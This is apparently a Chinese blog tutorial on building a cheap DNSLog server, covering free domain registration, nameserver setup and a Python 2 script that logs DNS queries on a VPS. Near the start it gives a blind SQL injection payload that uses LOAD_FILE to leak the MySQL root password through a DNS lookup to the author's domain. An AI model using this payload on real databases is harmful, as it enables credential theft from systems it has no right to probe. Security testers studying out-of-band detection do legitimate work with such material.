如何低成本搭建dnslog服務器
DNSLog,簡單來說,就是通過記錄對於域名的DNS請求,通過dns請求這個相對“隱蔽”的渠道,來委婉地獲取到想要獲得的信息。
例如,在一個針對mysql數據庫的註入中,如果沒有回顯,可能很多時候就要歇菜。
但如果對方的數據庫服務器連接公網並且是Windows機器的話,就可以用這種姿勢來獲取信息:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM user WHERE user='root' LIMIT 1),'.nogan.ga\\xxx'))
你將會看到類似:
當然你可能會說直接用http協議傳輸不就好了嗎,確實http協議也可以,但是http協議畢竟有局限的地方,例如容易被防火墻限制等。
近幾年DNSLog被尤其廣泛地運用於無回顯的SQL註入、命令執行、XML實體註入等漏洞的檢測當中,算是一門很基礎的老技術了。
關於DNSLog的具體應用,這裏就不多說了,感興趣的可以進一步閱讀以下文章:
https://www.anquanke.com/post/id/98096
http://www.freebuf.com/column/158579.html
https://www.cnblogs.com/afanti/p/8047530.html
以下主要分享下DNSLog服務的低成本構建。
準備材料:
(1) 一臺低成本的VPS:這裏推薦使用某國外的便宜VPS,完整root權限,單核512MB/10GSSD,¥128/年,購買鏈接在文章最後
(2) 一個可以接收郵件的郵箱:用來註冊免費域名
搭建過程
註冊域名
首先到 https://freenom.com 註冊用戶,同時註冊一個免費的域名
以我這裏為例,註冊一個nogan.ga
註冊的時候,在DNS選項中,選擇使用自己的DNS,新建DNS服務器的地址,例如我這裏自定義了兩個dns服務器,分別是
ns0.nogan.ga和ns1.nogan.ga,並且將他們的地址指向我的VPS服務器。
點擊Continue,進入到結算頁面。
如果你上一步沒有註冊用戶,那麽可以直接在這裏填你用來註冊用戶的郵箱,然後根據指引進行操作。
進入到Review and Checkout頁面,填入一些你的基本信息就可以了
這裏記得勾選Lock profile,你的信息就不會被whois查詢到了。
接著下一步,勾選Complate Order,域名就註冊成功了。
部署DNS服務
登錄你的VPS服務器,運行下面這個python腳本,將在你的VPS主機監聽UDP 53端口,並且回復DNS響應包:
記得修改IP地址和NS域名,在最後。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2014-06-29 03:01:25
# @Author : Your Name ([email protected])
# @Link : http://example.org
# @Version : $Id$
import SocketServer
import struct
import socket as socketlib
# DNS Query
class SinDNSQuery:
def __init__(self, data):
i = 1
self.name = ''
while True:
d = ord(data[i])
if d == 0:
break;
if d < 32:
self.name = self.name + '.'
else:
self.name = self.name + chr(d)
i = i + 1
self.querybytes = data[0:i + 1]
(self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5])
self.len = i + 5
def getbytes(self):
return self.querybytes + struct.pack('>HH', self.type, self.classify)
# DNS Answer RRS
# this class is also can be use as Authority RRS or Additional RRS
class SinDNSAnswer:
def __init__(self, ip):
self.name = 49164
self.type = 1
self.classify = 1
self.timetolive = 190
self.datalength = 4
self.ip = ip
def getbytes(self):
res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength)
s = self.ip.split('.')
res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3]))
return res
# DNS frame
# must initialized by a DNS query frame
class SinDNSFrame:
def __init__(self, data):
(self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12])
self.query = SinDNSQuery(data[12:])
def getname(self):
return self.query.name
def setip(self, ip):
self.answer = SinDNSAnswer(ip)
self.answers = 1
self.flags = 33152
def getbytes(self):
res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition)
res = res + self.query.getbytes()
if self.answers != 0:
res = res + self.answer.getbytes()
return res
# A UDPHandler to handle DNS query
class SinDNSUDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = self.request[0].strip()
dns = SinDNSFrame(data)
socket = self.request[1]
namemap = SinDNSServer.namemap
if(dns.query.type==1):
# If this is query a A record, then response it
name = dns.getname();
toip = None
ifrom = "map"
if namemap.__contains__(name):
# If have record, response it
# dns.setip(namemap[name])
# socket.sendto(dns.getbytes(), self.client_address)
toip = namemap[name]
elif namemap.__contains__('*'):
# Response default address
# dns.setip(namemap['*'])
# socket.sendto(dns.getbytes(), self.client_address)
toip = namemap['*']
else:
# ignore it
# socket.sendto(data, self.client_address)
# socket.getaddrinfo(name,0)
try:
toip = socketlib.getaddrinfo(name,0)[0][4][0]
ifrom = "sev"
# namemap[name] = toip
# print socket.getaddrinfo(name,0)
except Exception, e:
print 'get ip fail'
if toip:
dns.setip(toip)
print '%s: %s-->%s (%s)'%(self.client_address[0], name, toip, ifrom)
socket.sendto(dns.getbytes(), self.client_address)
else:
# If this is not query a A record, ignore it
socket.sendto(data, self.client_address)
# DNS Server
# It only support A record query
# user it, U can create a simple DNS server
class SinDNSServer:
def __init__(self, port=53):
SinDNSServer.namemap = {}
self.port = port
def addname(self, name, ip):
SinDNSServer.namemap[name] = ip
def start(self):
HOST, PORT = "0.0.0.0", self.port
server = SocketServer.UDPServer((HOST, PORT), SinDNSUDPHandler)
server.serve_forever()
# Now, test it
if __name__ == "__main__":
sev = SinDNSServer()
sev.addname('ns0.nogan.ga','x.x.x.x')
sev.addname('ns1.nogan.ga','x.x.x.x')
sev.addname('www.nogan.ga','y.y.y.y')
sev.addname('*', '127.0.0.1') # default address
sev.start() # start DNS server
將上面的ns0.nogan.ga和ns1.nogan.ga改成你的域名,並且將x.x.x.x改成你的VPS服務器地址。
如果你在搭建DNSLog的同時還想順便搭建一個網站的話,可以添加一個www記錄,指向你的web服務器地址。
星號是將任意地址執行127.0.0.1,這樣你的DNSLog請求記錄,都會被默認解析到127.0.0.1。
接著在服務器上運行
python dns.py
在任意機器上面ping xxxxx.YOURDOMAIN:
可以在VPS上觀察到請求已經過來了
但這個時候程序是一直在控制臺運行的,想要退出怎麽辦呢,用nohup將程序改為背景運行:
想要關閉的話,先查看端口並獲取進程號,然後kill即可:
Enjoy it~
附:
搬瓦工VPS優惠地址:
https://bandwagonhost.com/cart.php (可能要扶梯 = = )
如何低成本搭建dnslog服務器